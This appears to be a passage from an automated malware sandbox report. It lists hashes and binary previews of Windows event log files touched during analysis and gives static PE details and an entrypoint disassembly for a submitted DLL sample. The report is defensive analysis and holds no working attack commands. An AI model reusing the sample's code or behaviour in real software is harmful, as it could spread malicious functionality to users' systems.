Preview:	ElfChnk.."......-#......."......-#.......... ..........x.....................................................................I..................0.......................X...=...........................................................................................................................f...............?...........................m...................M...F.......................;4......%}......................&....S...................................E..................c...............................*..`...."......G:..l.........V...&.......................................................................F.....!...A.A...........G:..l......Pl...e..Pl............"...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l.......E...........T...'...L...............0....A..%...X........=.......M.e.s.s.a.g.e.......A..'...X........=.......F.u.n.c.t.i.o.n.......A..#...X........=.......S.o.u.r.c

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 14, DIRTY
Category:	dropped
Size (bytes):	78880
Entropy (8bit):	1.813424309005145
Encrypted:	false
SSDEEP:	384:9ihL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmx9Umy+Um5UmhhL6UsE0ZUm6:EY7LAmSY7LAm
MD5:	5832E7D34EA9C548568B1E616BCDDAFB
SHA1:	AD1634DE80DFA67FD9BB4E6FFE6581EF9D2CFF0E
SHA-256:	215F4A167ADBF2E87D108AFB23E64EE55C9A6CE2FF45BE3EDFB10B2A0F109B6D
SHA-512:	FF2374A7B03F944D961F681ABF587A1A02DB1E412839E265903A6A38D59AA09D71A44D19E00E10BD17FE1FD8D5FA67F2751D64FA09DB22CA6D185A28CEB8437B
Malicious:	false
Preview:	ElfFile.........................................................................................................................ElfChnk......................................1...3...&.......................................................................g.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F............................(...........................,..........................................................................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	67776
Entropy (8bit):	0.3664563325397789
Encrypted:	false
SSDEEP:	48:M1oWm7rP+wQNRBEZWTENO4b3BEoL/6q/oWm7rP+wQNRBEZWTENO4b3BEoL/6q:UkaNVaO82oL/6q/kaNVaO82oL/6q
MD5:	66E02E3E8F0FEB92AA22BA57CA6BBEBE
SHA1:	E136D43BADE2F4F6FEAE6090DD49F7EA6AE5168D
SHA-256:	D96EDEB850C538E6787328D4832A9C2F7432C3B26C9ADC4E539750464DFCB754
SHA-512:	BFD6DBE8459ED48A42EB1FBE8D0CA1D1DB010ED21B04441D283A512B4DFFDCD38679B93D338788662384D79CC73B47E8C0C4016A77F5AA37BB731A3FEC192DB5
Malicious:	false
Preview:	ElfChnk..............................................p......................................................................x...........................................F...=...........................................................................................................................f...............?...........................m...................M...F.......................................................&...........................................................................................**..................l.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.105856407104524
Encrypted:	false
SSDEEP:	384:VhBPiv5iKiR2ioAiRipipikiGi1iYiTi5i6inihm8i7zi+i0/iri8i2iaiI9ibis:VGqsD1dAsM9QSp
MD5:	A49BEAB6C1B19025A42FDA1F613A48B7
SHA1:	E81E83A5FC860D057E9DC0BEAECC2257CF0F4861
SHA-256:	DC7F1C66EFECACEBB1AEAB916298491FA4BBCEA0C3B075603F165BB4907A2D0B
SHA-512:	B2A1B0E69668A7A8C94490DCA1484E40478B3FE4ADE81301659EC74C50CCEF6F9BFA2668142A120EA2A05ED96DC795D2C6F025E0AB0BE41B8072E7E37F2B7938
Malicious:	false
Preview:	ElfChnk.y...............y....................j...l..........................................................................w8Vl................F...."......................=.......................#...................i%...................#...................................%......................f...............?.......................P.......................M...F............................/..................."...%...A..v........5..............................................................<...............**......y........~p.h...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	3.3849536655991894
Encrypted:	false
SSDEEP:	768:hHaIPeaQaEa8aIasakaEakaYaIaIa8agasakaMa4asagaEaIasaQaMa0asaAasaL:hP
MD5:	D71A358C3C595A0960A939DFACCEEB3F
SHA1:	0D93271B65FFAF422C4A29B8AFD27C5912064437
SHA-256:	33F1917163C6D5AE98821C7B9CA76BCCF2853A5430AEDA7E0E96373087CF2816
SHA-512:	3C7796AB6DDE3181B8C5BE899B83A9653CA1C2B4C0A45CD5D61CE40C5C535FBFD6C9EEBBE970159D3B8B8B34E74291B5BE6858FD0D077C9ACE8FF592B059E3F9
Malicious:	false
Preview:	ElfChnk.........@...............@...............`....f`H.....................................................................'<.................^...........................=...........................................................................................................................f...............?...........................m...................M...F.......................................................&.......................................................7...................................**..H...........c...l.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.4082854814444645
Encrypted:	false
SSDEEP:	384:3haXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJxXJ4pXJFXJeLXJDXJ9XJoXJ:3Q0yUkNYwD8imLEH4fretljQ
MD5:	629A54AB1C62EAB7DA6A00D6578F6F0B
SHA1:	C35F7F57428072D1A5C2A44454B8C75ECBE64088
SHA-256:	FBB078238BC25506FA5D37F15738E022F1430464466858D9E52C015C2D0E6F53
SHA-512:	7848A78D5EECE8069A80600AE3283FA91E592A2393F5A82A6670BD830332544E688A2B1193C08A9DEB3568D69133169ECA86E061A7D63D1E6E0A1B1484E343E1
Malicious:	false
Preview:	ElfChnk......................................C...F..3.Jf....................................................................z...................j...........................=...........................................................................................................................f...............?...........................m...................M...F............................0...........................8..&...........................................................C...........................**..............@V.$..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.348490523569564
Encrypted:	false
SSDEEP:	384:+hxxmZmCmsmzmZmTmomSm/mjm/memGmhmAm9mYmQm2qmwmHmLmlm9mGmdmpm3mfd:+ODcxlzYWs
MD5:	0F1B8CD5ED26A4DA771BDB5F454D870F
SHA1:	88458537CA9E4E22BAD7415C10A235C25EEB9BFD
SHA-256:	4C56B53599E7A5EC677A3BC99EEF1F6F0CE83317441C0F8FE74425C069D4C7DD
SHA-512:	C00CB2197D4B1D2137B445C285EFF456D36181ADAFA7474069B6F008EBB764475E8B53090BFBAFA03A8DC4ECA6BAB556552568C6B600439EFE925D1A50819CAC
Malicious:	false
Preview:	ElfChnk........................................h,............................................................................v................X...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................k.......&.......................1...........K.......................................................*..................k.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.7468847878197933
Encrypted:	false
SSDEEP:	384:ihm2j082AO2q2G2Z2f2V2h2d2h2B212x2:id
MD5:	2168C775D5DCCC582516B831034AC93B
SHA1:	8495CA0064C23D131CC4A6C5126CBC42BF93017F
SHA-256:	D396096CC0189B3FBAD27A5D019B698423C9382746402945F26A0635F46082FE
SHA-512:	E767798650253E41EEAAAEF1FD21453BD23DCAFFA3BAC651F83D6C7458CA1EABE6B2D4BD8D61F398587118918676451E9428DFF304F02D64F5E0FD56A5474720
Malicious:	false
Preview:	ElfChnk.........................................H ...q.....................................................................~'.................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...............................#.......................&...........................................................................................**................b.l.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 11, DIRTY
Category:	modified
Size (bytes):	69632
Entropy (8bit):	1.3034811700787372
Encrypted:	false
SSDEEP:	768:uhEpP9JcY6+g4+Ga6ouepLP6xIb13xIt13xI:uypP9JcY6+g4+Ga6
MD5:	6FFA7AF617C069392F3EF90A5F3129F9
SHA1:	D79FC5528541BE012CFE0E6558DACBAB09C96F7A
SHA-256:	3D4D281C309E1BFB40544D61AF0564F6DC69DB4D04C1E671E1E25FF450EB42F3
SHA-512:	4A4CC09226BC71331EDF0C148E17B2FEF10A1343345F4C4C069DA4652ED76A95C9D9D2FD35B4F9F06192CAE4D0CCA3F1062BA07DD551B0D9F969130F0927C197
Malicious:	false
Preview:	ElfFile.......................................................................................................................\|.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	111168
Entropy (8bit):	4.378848486770145
Encrypted:	false
SSDEEP:	384:VhRRVwGRA6RGRwR7R3ReRuRIRcRDR6bRgRwRcRgRpRZR+R+RlRcRqRmRRiR5Rkml:Vq/f2Lvxrakq/f2Lvxu
MD5:	AF0EA78545A33BCD509F345A3014ABFE
SHA1:	1BC48568D7CA4D0DBF2DD217C045216308D06082
SHA-256:	72D9267BA1F74BBEDA83768BA8F4DD5414CC8A18C2A1BD87EFB2D56B30B1713F
SHA-512:	B9DFAD0C8310930867C6F101DB28B4C2FDA5615F1CA3B592D4B487A3BF11091B630AA0EFB9AC368AD97922DBC00AF4D024D320E0E5C1B903CB7FA2FF7E0469B5
Malicious:	false
Preview:	ElfChnk.<.......l.......<.......l...........P...P...q.c.....................................................................le>.....................z...................T...=.......................................8.......................M...#...........................................m......pl..f...X.......dm..?.......................8........m......=.......M...F...1m..........{...................................Il..............................................................&...........................a...*......<........zDj.........._.X&........_.X...S.p...f........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.280894283545869
Encrypted:	false
SSDEEP:	384:Nth1hghdzhkh7hVhmh2h+hchuhshqh9hihXhMhxhzhwhohGh5h3hShChWhzhLhaE:TIFpkBmPVvZhJv
MD5:	895B188A8622F9F4BE91C41E1A439BA0
SHA1:	9D6561EEC77A9BAAF282C1FAD7D10E01C3160053
SHA-256:	7DCA11C307B9304783F9C4C8FD228387D2953CFED9364B9EA0A932534A325E8F
SHA-512:	927D18C0DE78188A23B35F2A8A56CCDC7F46C334790426693C20A182D84890305C7A8C62EABA12C96A84BA1C8A8AF6D0865FCF4BA76AC661B0BB968BFDBA045E
Malicious:	false
Preview:	ElfChnk.........................................(.....T.....................................................................\|5s.........................................6...=...........................................................................................................................f...............?...........................m...................M...F.......................................................&...........................................................................................**..............X..Kl.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WebAuthN%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.3017357672937786
Encrypted:	false
SSDEEP:	384:V+hOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVUVYVu0VmVfUz:V+yjbSJU
MD5:	A608DDAE2F87380F0D3A7DBCCD47792A
SHA1:	2D65DB93A142AC092546172DA7D77CBDB76EBA08
SHA-256:	845D0D62A98B3134E1843B276752963E215AD9CBB220114F4554CFC5239E610C
SHA-512:	54CA61E208040019268703ED1FD29B0E6F2C76E734387E47792120753595C9127FF41546822B96950C9B7523636EF7CD2E7B6BA244E64FD821D4BFB9ED4BD556
Malicious:	false
Preview:	ElfChnk........."..............."...........`:...;..........................................................................v...................&...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&..............................v.......................................................................................*..P...........y................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 5, DIRTY
Category:	dropped
Size (bytes):	5304
Entropy (8bit):	4.0810688176375765
Encrypted:	false
SSDEEP:	96:E0fRNVaO8sow/sTYS5oz/sTf/sTpUrrjjPA/sTnmrrjj/u3/sTz:E0LV7Xk8kozkDkNMvIkSvUkf
MD5:	4F086BB12F00301D9F6C30D6BBA4F7C0
SHA1:	3CFB3DE459E7C4DEEF20A55763436F4F50189BA2
SHA-256:	381A1FF1BA79546704E07CFA9BC2CF843085A82920D9907BA21C168E51CCFA64
SHA-512:	8F95B303C616C90BD8B3E49B4B452DC56C4EDDE07E544700B1AFB4F9FD630402F9ADE0DC9176B0B5C23602BCC74203242A34BAF396AE128396CDD8DDAAA69827
Malicious:	false
Preview:	ElfFile......................................................................................................................RyNElfChnk.........................................8...B.R........................................................................................\...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................5...............&.......................................................................................**..............r..!..............&...........\|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	69528
Entropy (8bit):	4.210192374961083
Encrypted:	false
SSDEEP:	384:z8BwBYBwBpBwBJBwBcjBwBAhhmBwBeKb3XkBwB0AVBwB0LuBwB0yeBwB0yxBwB0S:AraKbRaFTB
MD5:	7E6374D37098136D8B83FFC48269099F
SHA1:	8889FE1C32AEC313456C933D166E2016BED6BD1A
SHA-256:	BBA86525747073CEA12B1E591CBD4C6D4A3841CBF46DC961E73A6FE9EE600E1E
SHA-512:	01AE2E4A9A8CA186B34143B4C657C18FC2008BBBFE39EFB50E974702152E034FCB658304C7A3C72DCE5A5EA138D5F7C0284D1B11C90A50801AC502725B927EAB
Malicious:	false
Preview:	ElfChnk.R...............R...........................d..-.....................................................................L..............................................=...........................................................................................................................f...............?...........................m...................M...F.............................................../.......&...................................................................g.......................*..h...............l.........V...&...............................................................r.............!.....................l......Pl.....Pl.......d........................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.i.n.d.o.w.s. .F.i.r.e.w.a.l.l. .W.i.t.h. .A.d.v.a.n.c.e.d. .S.e.c.u.r.i.t.y.....qM.F...M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.W.i.n.d.o.w.s. .F.i.r.e.w.a.l.l. .W.i.t.h. .A.d.v.a.n.c.e.d. .S.e.c.u.r.i.t.y./.F.i.r.e.w.a.l.l....8m.....................................<

C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winlogon%4Operational.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	4.428253354580031
Encrypted:	false
SSDEEP:	384:zhtUEXUEINZUEIsUEI7UEIJUEIXoUEVUEmUEIvUEISUEIbUEIvUEIZUEIuUEIIUI:zAq3mQ6y5GyAN7nuo0pjGQQwjx
MD5:	CDA410A4B6EDA4F017D994EE4A4CBB2C
SHA1:	8D59FDD6C7117BF0A66EAF7A013AE0AB94686374
SHA-256:	28EC2D562E65B029F4D656D81ACFD470690880C5B74DF96A9D16B9DF64AC375E
SHA-512:	41206C9DB1937DBA09E1F00AAA1AAB4541DFE0EBD24067D3291E2618E4C47C567F96FAEEB3EE98C2716EF600AC0AD732BE9C1BC4C32872FCE8D561C7978AAA6B
Malicious:	false
Preview:	ElfChnk......................................'..()..uK.8..............................................................................................................>...=...........................................................................................................................f...............?...........................m...................M...F.......................................................&...........................................................................................**...............e.Kl.........V...&.......V...."[S<..~..f[........A..z...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

C:\Windows\System32\winevt\Logs\Security.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	131584
Entropy (8bit):	4.345029325788873
Encrypted:	false
SSDEEP:	768:J4i3wAElSZMQNGWjuMoBmHiVD52I569Sgw:n3/ElSCYoBmHiVAI569SF
MD5:	0F5627F52D337074B3352CB8367C66DA
SHA1:	026FEE4F39D345D46E9F555A501DEAE422E95465
SHA-256:	BA40BE2FBAD61F501BA41F13428A5DADF48D7B0F83C2911C533F000605717B22
SHA-512:	117135B11B89E1F86A89F15A32C7BD19A2A7EA5430D54AF4A35AD750FD567BA1921EFDBE748503084A82955C5B743ECCD4FC0B13AC5B64BF83940510C710991B
Malicious:	false
Preview:	ElfChnk.................8.......8...................=........................................................................).;....................s...h...............N...=...................................................N...............................................w.......2.......................+...................................Y...........).......M...P...:...........................................................................................&...................................................**......8.......F.C."R........t[..&.......t[..)}.P..1s..R.=.......A..1...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....Z...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

C:\Windows\System32\winevt\Logs\System.evtx

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	77896
Entropy (8bit):	4.359283077425977
Encrypted:	false
SSDEEP:	384:5FRcX9FRcXN8w49ADd9MtBr86FgF11nVOaMyhMUxqyfujn+RkCvp7RsrZQA+TRSi:TmLnLOZvEd4t2pLP5YDlYRPc6Qv
MD5:	4CE4BF0A347328B0FC0519BE0DDD5750
SHA1:	560445D7209ECBC8543D8D89F36E3FCB5B30014E
SHA-256:	8BF7BAC0FEB3224ABE0C4F11BB795ABF229468EFB32476035AEF0E69D4629AAA
SHA-512:	EBCB6C0E557DF57F1FD5306D34B7243A1AD86A276D09C5FEDEC88733BE607F9892A857636C82B1CC05A5142497152346CD759B58AD62DDA1076B7B1E8CBB403B
Malicious:	false
Preview:	ElfChnk.....................................p................................................................................UP.....................s...h...............N...=...................................................N...............................................w...............................C...................................U...........).......M...1...:...................................................................................................................................&...........**..(...........F.C."R............&............`.Wv..\|+.7W9.......A..-...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....V...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.566303383962769
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	26B1sczZ88.dll
File size:	530'432 bytes
MD5:	51ac05b8af0e9e0a2180f230588e795f
SHA1:	6aff1202f53fe4cc6282f9ad3ebdef95bb4cf49f
SHA256:	68f9c7084a93f5b0487210704343acb69339b5bd16921cf1dae0c20966911df0
SHA512:	60ab6f3d620cb09771469a7117b8978432f61a252073462b275dd66f21e48333af1cf462d1268c1e46611752d79387c21dafe929b263f99fbe6179e23e6f9075
SSDEEP:	12288:NrkdQN/1+XdYg6UMdB7qCzLohmL1BWrLc1t419lcaRto5C5u7d7777784YNt5Ox:NrGQ1QXdYgkdBW3hs/W0t419vRP5SE
TLSH:	82B41282F692C4F4C02341B029378A7BD276CD75085E92AECF90DF906D38656F465AEB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ur:.1.T.1.T.1.T.../.8.T.1.U...T./A..0.T./A..0.T./A..0.T./A..0.T.Rich1.T.........PE..L......L...........!................2......

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x10001a32
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:	NO_SEH
Time Stamp:	0x4C0E1488 [Tue Jun 8 09:59:36 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	00c5fd00087020a0645079ce30f4148b

Entrypoint Preview

Instruction
cmp dword ptr [esp+08h], 01h
push esi
jne 00007F056085A4F1h
mov esi, dword ptr [esp+08h]
push 00000104h
push 10003018h
push esi
mov dword ptr [10003290h], esi
call dword ptr [10002058h]
push esi
call dword ptr [100020ACh]
call 00007F0560859B58h
cmp eax, 01h
jne 00007F056085A4BEh
call 00007F0560859D52h
test eax, eax
jne 00007F056085A490h
call 00007F0560859CCEh
test eax, eax
jne 00007F056085A487h
call 00007F0560859B9Bh
call 00007F0560859CF9h
cmp eax, 01h
jne 00007F056085A49Dh
push 00000000h
push 00000000h
push eax
push 00000000h
call dword ptr [100020A8h]
mov dword ptr [1000329Ch], eax
test eax, eax
je 00007F056085A487h
call 00007F056085A3C9h
call 00007F0560859AACh
jmp 00007F056085A4C5h
cmp dword ptr [esp+0Ch], 00000000h
jne 00007F056085A4BBh
mov eax, dword ptr [1000329Ch]
test eax, eax
je 00007F056085A4ADh
push eax
call dword ptr [100020A4h]
push FFFFFFFFh
push dword ptr [10003298h]
call dword ptr [10002064h]
push dword ptr [10003298h]
mov esi, dword ptr [10002038h]
call esi
push dword ptr [1000329Ch]
call esi
call 00007F0560859ABFh
xor eax, eax
inc eax
pop esi
retn 000Ch
jmp dword ptr [10003244h]
jmp dword ptr [00003014h]

Rich Headers

Programming Language:

[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[EXP] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2870	0x159	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2380	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x7fa90	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x84000	0x164	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
